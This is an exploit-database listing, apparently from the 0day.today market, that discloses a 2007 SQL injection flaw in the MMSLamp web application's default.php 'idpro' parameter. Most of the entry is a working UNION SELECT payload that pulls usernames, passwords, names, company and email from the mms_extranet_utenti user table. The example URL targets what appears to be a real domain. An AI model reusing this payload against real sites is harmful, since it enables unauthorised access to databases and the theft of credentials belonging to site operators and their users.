[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MMSLamp (idpro) Remote SQL Injection Vulnerability

Author
x0kster
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2392
Category
web applications
Date add
23-12-2007
Platform
unsorted
==================================================
MMSLamp (idpro) Remote SQL Injection Vulnerability
==================================================



Name            :  mmsLamp SQL Injection Vulnerability.
Author          :  x0kster
Date            :  22/12/2007
Bug in          :  default.php
PoC             :  http://site.com/default.php?service=prodotti_dettaglio&idpro=[SQL]

Example: 

http://www.brand039.com/default.php?service=prodotti_dettaglio&idpro=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(username,0x3a,password,0x3a,nome,0x3a,cognome,0x3a,azienda,0x3a,email),20,21,22+from+mms_extranet_utenti+where+id=1/*




#  0day.today [2024-11-16]  #